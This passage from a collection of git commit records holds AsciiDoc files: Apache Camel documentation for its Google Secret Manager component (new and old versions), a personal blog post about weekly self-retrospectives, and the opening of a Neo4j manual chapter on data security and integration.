:\n\n--------------------------------------------------------\nexport GOOGLE_APPLICATION_CREDENTIALS=\"\/home\/user\/Downloads\/my-key.json\"\n--------------------------------------------------------\n\n\n== URI Format\n\n--------------------------------------------------------\ngoogle-secret-manager:\/\/functionName[?options]\n--------------------------------------------------------\n\nYou can append query options to the URI in the following format,\n`?options=value&option2=value&...`\n\nFor example in order to call the function `myCamelFunction` from the project `myProject` and location `us-central1`, use the following 
snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"google-secret-manager:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=createSecret\")\n .to(\"direct:test\");\n--------------------------------------------------------------------------------\n\n\n\n\/\/ component-configure options: START\n\n\/\/ component-configure options: END\n\n\/\/ component options: START\ninclude::partial$component-configure-options.adoc[]\ninclude::partial$component-endpoint-options.adoc[]\n\/\/ component options: END\n\n\/\/ endpoint options: START\n\n\/\/ endpoint options: END\n\/\/ component headers: START\ninclude::partial$component-endpoint-headers.adoc[]\n\/\/ component headers: END\n\n=== Using GCP Secret Manager Properties Source\n\nTo use GCP Secret Manager you need to provide a _serviceAccountKey_ file and the GCP _projectId_.\nThis can be done using environment variables before starting the application:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_SERVICE_ACCOUNT_KEY=file:\/\/\/\/path\/to\/service.accountkey\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nYou can also configure the credentials in the `application.properties` file such as:\n\n[source,properties]\n----\ncamel.vault.gcp.serviceAccountKey = serviceAccountKey\ncamel.vault.gcp.projectId = projectId\n----\n\nIf you want instead to use the https:\/\/cloud.google.com\/docs\/authentication\/production[GCP default client instance], you'll need to provide the following env variables:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_USE_DEFAULT_INSTANCE=true\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nYou can also configure the credentials in the `application.properties` file such as:\n\n[source,properties]\n----\ncamel.vault.gcp.useDefaultInstance = true\ncamel.vault.gcp.projectId = projectId\n----\n\nAt this point you'll be able to reference a property in the following way by using `gcp:` as prefix in the `{{ }}` syntax:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nWhere `route` will be the name of the secret stored in the GCP Secret Manager Service.\n\nYou could specify a default value in case the secret is not present on GCP Secret Manager:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route:default}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nIn this case if the secret doesn't exist, the property will fall back to \"default\" as value.\n\nAlso, you are able to get a particular field of the secret. If you have, for example, a secret named `database` of this form:\n\n[source,json]\n----\n{\n \"username\": \"admin\",\n \"password\": \"password123\",\n \"engine\": \"postgres\",\n \"host\": \"127.0.0.1\",\n \"port\": \"3128\",\n \"dbname\": \"db\"\n}\n----\n\nyou're able to get a single field's value in your route, for example:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nOr re-use the property as part of an endpoint.\n\nYou could specify a default value in case the particular field of the secret is not present on GCP Secret Manager:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username:admin}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nIn this case if the secret doesn't exist or the secret exists, but the username field is not part of the secret, the property will fall back to \"admin\" as value.\n
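\nAs a hedged sketch of re-using such properties inside an endpoint URI (the FTP host, port and directory here are purely illustrative), the fields of the `database` secret above could be referenced like this:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"ftp:{{gcp:database\/host}}:21\/uploads?username={{gcp:database\/username}}&amp;password={{gcp:database\/password}}\"\/>\n <\/route>\n<\/camelContext>\n----\n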
\nThere is also a syntax to get a particular version of the secret, for both approaches: with a field\/default value specified, or only with the secret name:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the RAW `route` secret with version '1'.\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route:default@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the `route` secret value with version '1', or the default value in case the secret doesn't exist or the version doesn't exist.\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username:admin@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the username field of the database secret with version '1', or `admin` in case the secret doesn't exist or the version doesn't exist.\n\nThere are only two requirements:\n\n- Add the `camel-google-secret-manager` JAR to your Camel application.\n- Give the service account used permissions to perform operations at the secret management level (for example accessing the secret payload, or being admin of the Secret Manager service).\n\n=== Automatic Camel context reloading on Secret Refresh\n\nReloading the Camel context on a secret refresh can be achieved by specifying the usual credentials (the same used for the Google Secret Manager Property Function).\n\nWith environment variables:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_USE_DEFAULT_INSTANCE=true\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nor as plain Camel main properties:\n\n[source,properties]\n----\ncamel.vault.gcp.useDefaultInstance = true\ncamel.vault.gcp.projectId = projectId\n----\n\nOr by specifying a path to a service account key file, instead of using the default instance.\n\nTo enable the automatic refresh you'll need to set additional properties:\n\n[source,properties]\n----\ncamel.vault.gcp.projectId = projectId\ncamel.vault.gcp.refreshEnabled=true\ncamel.vault.gcp.refreshPeriod=60000\ncamel.vault.gcp.secrets=hello*\ncamel.vault.gcp.subscriptionName=subscriptionName\ncamel.main.context-reload-enabled = true\n----\n\nwhere `camel.vault.gcp.refreshEnabled` will enable the automatic context reload, `camel.vault.gcp.refreshPeriod` is the interval of time between two different checks for update events, and `camel.vault.gcp.secrets` is a regex representing the secrets we want to track for updates.\n\nNote that `camel.vault.gcp.secrets` is not mandatory: if not specified, the task responsible for checking update events will take into account all the properties with a `gcp:` prefix.\n\nThe `camel.vault.gcp.subscriptionName` is the subscription name created in relation to the Google PubSub topic associated with the tracked secrets.\n\nThis mechanism makes use of the notification system of Google Secret Manager: through this feature, every secret can be associated with up to ten Google PubSub topics. These topics will receive\nevents related to the life cycle of the secret.\n
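\nAs a hedged illustration (the secret and topic names are hypothetical, and this assumes the `gcloud` CLI is available), a secret can be associated with a notification topic at creation time:\n\n[source,bash]\n----\ngcloud secrets create hello --topics=projects\/myProject\/topics\/secret-events\n----\n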
\nThere are only two requirements:\n\n- Add the `camel-google-secret-manager` JAR to your Camel application.\n- Give the service account used permissions to perform operations at the secret management level (for example accessing the secret payload, or being admin of the Secret Manager service), and also permissions over the PubSub service.\n\n=== Google Secret Manager Producer operations\n\nThe Google Secret Manager component provides the following operations on the producer side:\n\n- createSecret\n- getSecretVersion\n- deleteSecret\n- listSecrets\n\nIf you don't specify an operation, the producer will default to the `createSecret` operation.\n\n=== Google Secret Manager Producer Operation examples\n\n- createSecret: This operation will create a secret in the Secret Manager service\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .setBody(constant(\"hello\"))\n .to(\"google-secret-manager:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=createSecret\")\n .log(\"body:${body}\")\n--------------------------------------------------------------------------------\n\n- getSecretVersion: This operation will retrieve a secret value with the latest version in the Secret Manager service\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-secret-manager:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=getSecretVersion\")\n .log(\"body:${body}\")\n--------------------------------------------------------------------------------\n\nThis will log the value of the secret \"test\".\n\n- deleteSecret: This operation will delete a secret\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-secret-manager:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=deleteSecret\")\n--------------------------------------------------------------------------------\n\n- listSecrets: This operation will return the list of secrets for the project myProject\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .to(\"google-secret-manager:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=listSecrets\")\n--------------------------------------------------------------------------------\n\n\ninclude::spring-boot:partial$starter.adoc[]\n","old_contents":"= Google Secret Manager Component\n:doctitle: Google Secret Manager\n:shortname: google-secret-manager\n:artifactid: camel-google-secret-manager\n:description: Manage Google Secret Manager Secrets\n:since: 3.16\n:supportlevel: Stable\n:component-header: Only producer is supported\n\/\/Manually maintained attributes\n:group: Google\n:camel-spring-boot-name: google-secret-manager\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe Google Secret Manager component provides access to https:\/\/cloud.google.com\/secret-manager\/[Google Cloud Secret Manager]\n\nMaven users will need to add the following dependency to their pom.xml\nfor 
this component:\n\n[source,xml]\n------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-google-secret-manager<\/artifactId>\n <!-- use the same version as your Camel core version -->\n <version>x.x.x<\/version>\n<\/dependency>\n\n------------------------------------------------------\n\n[[GoogleSecretManager-AuthenticationConfiguration]]\n\n== Authentication Configuration\n\nGoogle Secret Manager component authentication is targeted for use with the GCP Service Accounts.\nFor more information please refer to https:\/\/github.com\/googleapis\/google-cloud-java#authentication[Google Cloud Authentication].\n\nWhen you have the **service account key** you can provide authentication credentials to your application code.\nGoogle security credentials can be set through the component endpoint:\n\n[source,java]\n--------------------------------------------------------\nString endpoint = \"google-secret-manager:\/\/myCamelFunction?serviceAccountKey=\/home\/user\/Downloads\/my-key.json\";\n--------------------------------------------------------\n\nOr by setting the environment variable `GOOGLE_APPLICATION_CREDENTIALS` :\n\n--------------------------------------------------------\nexport GOOGLE_APPLICATION_CREDENTIALS=\"\/home\/user\/Downloads\/my-key.json\"\n--------------------------------------------------------\n\n\n== URI Format\n\n--------------------------------------------------------\ngoogle-secret-manager:\/\/functionName[?options]\n--------------------------------------------------------\n\nYou can append query options to the URI in the following format,\n`?options=value&option2=value&...`\n\nFor example in order to call the function `myCamelFunction` from the project `myProject` and location `us-central1`, use the following snippet:\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"google-secret-manager:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=createSecret\")\n .to(\"direct:test\");\n--------------------------------------------------------------------------------\n\n\n\n\/\/ component-configure options: START\n\n\/\/ component-configure options: END\n\n\/\/ component options: START\ninclude::partial$component-configure-options.adoc[]\ninclude::partial$component-endpoint-options.adoc[]\n\/\/ component options: END\n\n\/\/ endpoint options: START\n\n\/\/ endpoint options: END\n\/\/ component headers: START\ninclude::partial$component-endpoint-headers.adoc[]\n\/\/ component headers: END\n\n=== Using GCP Secret Manager Properties Source\n\nTo use GCP Secret Manager you need to provide _serviceAccountKey_ file and GCP _projectId_.\nThis can be done using environmental variables before starting the application:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_SERVICE_ACCOUNT_KEY=file:\/\/\/\/path\/to\/service.accountkey\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nYou can also configure the credentials in the `application.properties` file such as:\n\n[source,properties]\n----\ncamel.vault.gcp.serviceAccountKey = accessKey\ncamel.vault.gcp.projectId = secretKey\n----\n\nIf you want instead to use the https:\/\/cloud.google.com\/docs\/authentication\/production[GCP default client instance], you'll need to provide the following env variables:\n\n[source,bash]\n----\nexport $CAMEL_VAULT_GCP_USE_DEFAULT_INSTANCE=true\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nYou can also configure the credentials in the 
`application.properties` file such as:\n\n[source,properties]\n----\ncamel.vault.gcp.useDefaultInstance = true\ncamel.vault.aws.projectId = region\n----\n\nAt this point you'll be able to reference a property in the following way by using `gcp:` as prefix in the `{{ }}` syntax:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nWhere `route` will be the name of the secret stored in the GCP Secret Manager Service.\n\nYou could specify a default value in case the secret is not present on GCP Secret Manager:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route:default}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nIn this case if the secret doesn't exist, the property will fallback to \"default\" as value.\n\nAlso, you are able to get particular field of the secret, if you have for example a secret named database of this form:\n\n[source,json]\n----\n{\n \"username\": \"admin\",\n \"password\": \"password123\",\n \"engine\": \"postgres\",\n \"host\": \"127.0.0.1\",\n \"port\": \"3128\",\n \"dbname\": \"db\"\n}\n----\n\nYou're able to do get single secret value in your route, like for example:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nOr re-use the property as part of an endpoint.\n\nYou could specify a default value in case the particular field of secret is not present on GCP Secret Manager:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username:admin}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nIn this case if the secret doesn't exist or the secret exists, but the username field is not part of the secret, the property will fallback to \"admin\" as value.\n\nThere is also the syntax to get a particular version of the secret for both the approach, with field\/default value specified or only with secret:\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the RAW route secret with version '1'.\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <to uri=\"{{gcp:route:default@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the route secret value with version '1' or default value in case the secret doesn't exist or the version doesn't exist.\n\n[source,xml]\n----\n<camelContext>\n <route>\n <from uri=\"direct:start\"\/>\n <log message=\"Username is {{gcp:database\/username:admin@1}}\"\/>\n <\/route>\n<\/camelContext>\n----\n\nThis approach will return the username field of the database secret with version '1' or admin in case the secret doesn't exist or the version doesn't exist.\n\nThere are only two requirements: \n- Adding `camel-google-secret-manager` JAR to your Camel application.\n- Give the service account used permissions to do operation at secret management level (for example accessing the secret payload, or being admin of secret manager service)\n\n=== Automatic Camel context reloading on Secret Refresh\n\nBeing able to reload Camel context on a Secret Refresh, could be done by specifying the usual credentials (the same used for Google Secret Manager Property Function).\n\nWith Environment variables:\n\n[source,bash]\n----\nexport 
$CAMEL_VAULT_GCP_USE_DEFAULT_INSTANCE=true\nexport $CAMEL_VAULT_GCP_PROJECT_ID=projectId\n----\n\nor as plain Camel main properties:\n\n[source,properties]\n----\ncamel.vault.gcp.useDefaultInstance = true\ncamel.vault.aws.projectId = projectId\n----\n\nOr by specifying a path to a service account key file, instead of using the default instance.\n\nTo enable the automatic refresh you'll need additional properties to set:\n\n[source,properties]\n----\ncamel.vault.gcp.projectId= projectId\ncamel.vault.gcp.refreshEnabled=true\ncamel.vault.gcp.refreshPeriod=60000\ncamel.vault.gcp.secrets=hello*\ncamel.vault.gcp.subscriptionName=subscriptionName\ncamel.main.context-reload-enabled = true\n----\n\nwhere `camel.vault.gcp.refreshEnabled` will enable the automatic context reload, `camel.vault.gcp.refreshPeriod` is the interval of time between two different checks for update events and `camel.vault.gcp.secrets` is a regex representing the secrets we want to track for updates.\n\nNote that `camel.vault.gcp.secrets` is not mandatory: if not specified the task responsible for checking updates events will take into accounts or the properties with an `gcp:` prefix.\n\nThe `camel.vault.gcp.subscriptionName` is the subscription name created in relation to the Google PubSub topic associated with the tracked secrets.\n\nThis mechanism while make use of the notification system related to Google Secret Manager: through this feature, every secret could be associated to one up to ten Google Pubsub Topics. These topics will receive \nevents related to life cycle of the secret.\n\nThere are only two requirements: \n- Adding `camel-google-secret-manager` JAR to your Camel application.\n- Give the service account used permissions to do operation at secret management level (for example accessing the secret payload, or being admin of secret manager service and also have permission over the Pubsub service)\n\n=== Google Secret Manager Producer operations\n\nGoogle Functions component provides the following operation on the producer side:\n\n- createSecret\n- getSecretVersion\n- deleteSecret\n- listSecrets\n\nIf you don't specify an operation by default the producer will use the `createSecret` operation.\n\n=== Google Secret Manager Producer Operation examples\n\n- createSecret: This operation will create a secret in the Secret Manager service\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .setBody(constant(\"hello\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=createSecret\")\n .log(\"body:${body}\")\n--------------------------------------------------------------------------------\n\n- getSecretVersion: This operation will retrieve a secret value with latest version in the Secret Manager service\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=getSecretVersion\")\n .log(\"body:${body}\")\n--------------------------------------------------------------------------------\n\nThis will log the value of the secret \"test\".\n\n- deleteSecret: This operation will delete a 
secret\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=deleteSecret\")\n--------------------------------------------------------------------------------\n\n- listSecrets: This operation will return the secrets list for the project myProject\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:start\")\n .setHeader(\"GoogleSecretManagerConstants.SECRET_ID, constant(\"test\"))\n .to(\"google-functions:\/\/myProject?serviceAccountKey=\/home\/user\/Downloads\/my-key.json&operation=listSecrets\")\n--------------------------------------------------------------------------------\n\n\ninclude::spring-boot:partial$starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d97a81c9b88887a1323fc6993d3aaabe8b3b70ba","subject":"Update 2016-03-18-Self-retrospective-increases-happiness-of-life.adoc","message":"Update 2016-03-18-Self-retrospective-increases-happiness-of-life.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-03-18-Self-retrospective-increases-happiness-of-life.adoc","new_file":"_posts\/2016-03-18-Self-retrospective-increases-happiness-of-life.adoc","new_contents":"= Self-retrospective increases happiness of life\n\n:hp-image: \/covers\/self-retrospective-increases-happiness-of-life.jpeg\n:hp-tags: happiness, productivity, retrospective, life-hack\n:hp-alt-title: Self-retrospective increases happiness of life\n:published_at: 2016-03-18\n:tk-twitter: http:\/\/twitter.com\/[@Kacanovski]\n:self-retro-blog-post: http:\/\/tomek.kaczanowscy.pl\/2016\/01\/2016-year-self-retro\/[self-retros]\n:pomodores: https:\/\/mikealdo.github.io\/2016\/03\/14\/Pomodoro-and-happiness-in-developer-life.html[pomodoro technique]\n\nRecently I read good advice by {tk-twitter} about doing {self-retro-blog-post}. After some thinking about the idea, I decided to adopt it for my work and personal life. After six weeks of doing it, I can share some insights from a practical perspective.\n\n== Routine matters\nOne of the fundamental parts of doing self-retros is making notes day by day. So it comes with the need to build a habit of tracking stuff at a regular time. Because I am adopting self-retros also for personal stuff, I needed to do it twice a day - once before leaving work and once at the very end of the day. Occasionally I forgot to write down the part about personal stuff, mainly because I was enjoying time with my kids and girlfriend and forgot all the commitments. So I tried to recover the personal part the next morning, and it was not so good, because I usually forgot something during the night.\n\n== Paper wins\nThe second main experience was that I started writing notes into a paper notebook, and it was quite useful. Instead of needing to open a PC or notebook\/tablet\/phone and try to use some application (I am not even sure I would be able to find a useful app), it was super comfortable to use paper and some color markers. Because it gives you so many variants of how the stuff will look, it was fun to observe how my approach changed over time. 
Sometimes they were text notes, sometimes notes with pictures and smileys, and at other times illustrations without any text. After all, I doubt that any application has such variability. And doing the retrospective on those variably designed pages was also quite entertaining.\n\n== Sunday afternoon\nI did one retro on Friday afternoon, one on Monday morning and the last four on Sunday afternoon. With Friday afternoon I had a problem, because it left too long a gap before I had the opportunity to perform some action from the list. And it was not taking into account the personal part of the weekend. On Monday morning I was not satisfied with having no time available to do something with the personal items from the list. So I believe that if you are doing self-retros also for personal stuff, the time to do it is Sunday afternoon. If you identify that you missed something personally important, you still have some time to do something about it. For work stuff you have another perspective than doing it immediately after work with possible tiredness or frustration. And you are prepared for Monday morning with a list of items, so you can start working immediately.\n\n== Retro itself\nFrom agile retrospectives I know that if you do not end the retro with a list of things to be done, new approaches to be followed and tickets raised, it is not a useful retrospective. So having a clear, prioritized list of stuff that needs to be done was my first goal. Also, I realized that it is almost necessary to praise myself for the good work of that week, to have a feeling that my work\/personal balance is acceptable for my living. It is common that humans have the ability to forget bad things, and doing self-retros helps with seeing things which did not work properly and identifying stuff for improvement. After rethinking the things achieved in that particular week, I sometimes had the feeling that something important was missing. And I realized that I had forgotten to do something which I had kept only in my mind for weeks; without placing such an activity on any list, I always forgot to do it. Nice.\n\n== Third week was most challenging\nI do not know exactly why, but I had problems with my routine in the third week. Maybe it was because I was not seeing a direct influence on my life, some boring tasks overwhelmed me, or I obviously had not done anything on some of the days. Or doubts about the benefits of doing it. Weird. The fourth week was normal, without anomalies, and it started to be really useful, so I do not understand it much - maybe you have some insights into how that was possible.\n\n== What will be next?\nIf I can assess doing self-retros: it is quite an interesting and useful technique if it is done on a regular basis. It particularly helps to achieve some work\/personal life balance. It successfully beat the feeling \u201cI have not done anything today\u201d. It helps with focusing on important things first. So: useful, I recommend it to everyone. As I started with the {pomodores} before doing self-retros, it was quite easy to adopt, because I already had the actual work done on a detailed list. I will stick to these two enhancements of my life, because they have proven to work and help, but as always I am open to anything else which could be even more useful. Do you know about something better?\n\n*P.S.* If you enjoyed reading this blog post, could you do me a favor and tweet it and\/or leave a comment? 
Thanks!","old_contents":"= Self-retrospective increases happiness of life\n\n:hp-image: \/covers\/self-retrospective-increases-happiness-of-life.jpeg\n:hp-tags: happiness, productivity, retrospective, life-hack\n:hp-alt-title: Self-retrospective increases happiness of life\n:published_at: 2016-02-20\n:tk-twitter: http:\/\/twitter.com\/[@Kacanovski]\n:self-retro-blog-post: http:\/\/tomek.kaczanowscy.pl\/2016\/01\/2016-year-self-retro\/[self-retros]\n:pomodores: https:\/\/mikealdo.github.io\/2016\/03\/14\/Pomodoro-and-happiness-in-developer-life.html[pomodoro technique]\n\nRecently I read good advice by {tk-twitter} about doing {self-retro-blog-post}. After some thinking about the idea I decided to adopt it to my work and personal life. After six weeks of doing it I can share some insights from practical perspective.\n\n== Routine matters\nOne of the fundamental part of doing self-retros is making notes day by day. So it comes with need to have habit to track stuff at regular time. Because I am adopting self-retro also for personal stuff it was needed to do it twice a day - once before leaving the work and once on the very end of the day. Occasionally I forgot to write down part about personal stuff mainly due to fact that I was enjoying time with my kids, girlfriend and forgot to all the commitments. So I tried to recovery personal part on next morning and it was not so good due to fact that I usually forgot to something during to night.\n\n== Paper wins\nSecond main experience was that I was started with writing notes to paper notebook and it was quite useful. Instead of need to open PC or notebook\/tablet\/phone and try to use some application (I am not sure even if I would be able some useful app to find) it was super comfortable to use paper and some color markers. Because it\u2019s giving to you so many variants how the stuff will look it was funny to observe how is my approach changing in time. Once it were text notes, once notes with pictures, smileys and in other time it were illustrations without any text. After all I doubt that some application has such variability. And doing retrospective on that variable designed pages was also quite entertaining.\n\n== Sunday afternoon\nI did one retro on Friday afternoon, one on Monday morning and last four on Sunday afternoon. With Friday afternoon I had a problem because it was too long to have opportunity perform some action from list. And it wasn\u2019t taking into account personal part on the weekend. On Monday morning I was not satisfied with not available time something to do with personal items from list. So I believe that if you are doing self-retro also for personal stuff, the time for do it\u2019s Sunday afternoon. If you identify that you miss something personally important you still have some time to do something with it. For work stuff you have another perspective than doing it immediately after work with possible tiredness or frustration. And you are prepared for Monday morning with some list of items so you can start working immediately.\n\n== Retro itself\nFrom agile retrospectives I know that if you are not ending retro with list of things to be done, new approaches to be followed, tickets raised, it\u2019s not useful retrospective. So to have clear list with stuff needs to be done, stuff which has some priority was my first goal. Also I realized that it\u2019s almost necessary to praise myself for such good work on that week to have a feeling that my work\/personal balance is acceptable for my living. 
It\u2019s common that human have ability to forget bad things and doing self-retros helps with seeing things which didn\u2019t work properly and identify stuff for improvement. After rethinking achieved things on that particular week I had sometimes feeling that something important was missing. And realized that I forgot to do something which I had only in my mind for weeks but without placing such activity to any list I always forgot to do it. Nice.\n\n== Third week was most challenging\nI don\u2019t know exactly why, but I had problems with my routine on third week. Maybe it was because I was not seeing direct influence to my life, some boring tasks overwhelmed me or I obviously haven\u2019t done anything on some of the day. Or doubts about benefits of doing it. Weird. Fourth week was normal without anomalies and started to be so useful so don\u2019t understand much, maybe you can have some insights how it was possible.\n\n== What will be next?\nIf I can assess doing self-retro, it\u2019s quite interesting and useful technique if it\u2019s done on regular basis. It particularly helps achieve some work\/personal life balance. It successfully beat feeling \u201cI haven\u2019t done anything today\u201d. It helps focusing to important things firstly. So, useful, I recommend it for everyone. As I started with {pomodores} before doing self-retros, it was quite easy to adopt it because I had actual work done on detailed list already. I\u2019ll stick to these to enhancements of my life because it has proven that it works and helps but as always I am open to anything else which can be even more useful. Do you know about something better?\n\n*P.S.* If you enjoyed reading this blog post, could you do me favor and tweet it or\/and leave a comment? Thanks!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"daa0c8e24c001f131ff1317da2b916777bffee13","subject":"Fixed error in max number of properties.","message":"Fixed error in max number of properties.\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"manual\/src\/main\/resources\/reference\/capabilities\/cap-details.asciidoc","new_file":"manual\/src\/main\/resources\/reference\/capabilities\/cap-details.asciidoc","new_contents":"[[capabilities]]\nCapabilities\n============\n\n\/\/\/\/\/\/\/\/\/\nDetails, originally contained in the capabilities document.\n\/\/\/\/\/\/\/\/\/\n\n[[capabilities-data-security]]\n== Data Security ==\n\nSome data may need to be protected from unauthorized access (e.g., theft, modification). 
\nNeo4j does not deal with data encryption explicitly, but supports all means built into the Java programming language and the JVM to protect data by encrypting it before storing.\n\nFurthermore, data can be easily secured by running on an encrypted datastore at the file system level.\nFinally, data protection should be considered in the upper layers of the surrounding system in order to prevent problems with scraping, malicious data insertion, and other threats.\n\n[[capabilities-data-integrity]]\n== Data Integrity ==\n\nIn order to keep data consistent, there need to be mechanisms and structures that guarantee the integrity of all stored data.\nIn Neo4j, data integrity is maintained for the core graph engine together with other data sources - see below.\n\n[[capabilities-core-graph-engine]]\n=== Core Graph Engine ===\n\nIn Neo4j, the whole data model is stored as a graph on disk and persisted as \npart of every committed transaction.\nIn the storage layer, Relationships, Nodes, and Properties have direct pointers to each other.\nThis maintains integrity without the need for data duplication between the different backend store files.\n\n[[capabilities-different-data-sources]]\n=== Different Data Sources ===\n\nIn a number of scenarios, the core graph engine is combined with other systems \nin order to achieve optimal performance for non-graph lookups.\nFor example, Apache Lucene is frequently used as an additional index system for text queries that would otherwise be very processing-intensive in the graph layer.\n\nTo keep these external systems in synchronization with each other, Neo4j provides \nfull Two Phase Commit transaction management, with rollback support over all data \nsources.\nThus, failed index insertions into Lucene can be transparently rolled back in all data sources, keeping the data up-to-date.\n\n[[capabilities-data-integration]]\n== Data Integration ==\n\nMost enterprises rely primarily on relational databases to store their data, but \nthis may cause performance limitations.\nIn some of these cases, Neo4j can be used as an extension to supplement search\/lookup for faster decision making.\nHowever, in any situation where multiple data repositories contain the same data, synchronization can be an issue.\n\nIn some applications, it is acceptable for the search platform to be slightly out \nof sync with the relational database.\nIn others, tight data integrity (e.g., between Neo4j and an RDBMS) is necessary.\nTypically, this has to be addressed for data changing in real-time and for bulk data changes happening in the RDBMS.\n\nA few strategies for synchronizing integrated data follow.\n\n[[capabilities-event-based-synchronization]]\n=== Event-based Synchronization ===\n\nIn this scenario, all data stores, both RDBMS and Neo4j, are fed with domain-specific \nevents via an event bus.\nThus, the data held in the different backends is not actually synchronized but rather replicated.
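\n\nFor illustration, here is a minimal, framework-free sketch of this pattern in Java. The event payload and the two handlers are made-up names for the sake of the example; in a real system one handler would write to the RDBMS and the other to Neo4j:\n\n[source,java]\n----\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.function.Consumer;\n\npublic class DomainEventBus {\n\n    \/\/ Each backend registers its own subscriber and applies every event\n    \/\/ independently, so the stores are replicated rather than synchronized.\n    private final List<Consumer<String>> subscribers = new ArrayList<>();\n\n    public void subscribe(Consumer<String> subscriber) {\n        subscribers.add(subscriber);\n    }\n\n    public void publish(String event) {\n        subscribers.forEach(subscriber -> subscriber.accept(event));\n    }\n\n    public static void main(String[] args) {\n        DomainEventBus bus = new DomainEventBus();\n        bus.subscribe(event -> System.out.println(\"RDBMS handler stores: \" + event));\n        bus.subscribe(event -> System.out.println(\"Neo4j handler stores: \" + event));\n        bus.publish(\"customer-created:42\");\n    }\n}\n----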
